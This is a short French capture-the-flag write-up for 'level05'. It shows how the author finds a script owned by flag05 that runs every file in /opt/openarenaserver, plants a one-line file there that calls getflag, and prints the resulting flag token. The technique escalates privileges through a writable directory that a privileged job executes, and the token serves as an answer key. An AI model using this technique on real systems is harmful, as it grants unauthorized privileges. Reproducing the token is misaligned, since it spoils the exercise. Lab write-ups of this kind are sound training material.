| .. | ||
| flag | ||
| README.md | ||
Lors de l'arriver sur le level05 je remarque que le dossier home et vide je decide donc faire une petite recherche de quel fichier appartient au flag05
find / -user flag05 2> /dev/null
/usr/sbin/openarenaserver
/rofs/usr/sbin/openarenaserver
Nous n'avons pas les permissions d'executer ce fichier mais nous pouvons le lire:
cat /usr/sbin/openarenaserver
#!/bin/sh
for i in /opt/openarenaserver/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
et je vais faire un petit fichier
echo 'getflag > /tmp/flag' > /opt/openarenaserver/notanexploit
cat /tmp/flag
Check flag.Here is your token : viuaaale9huek52boumoomioc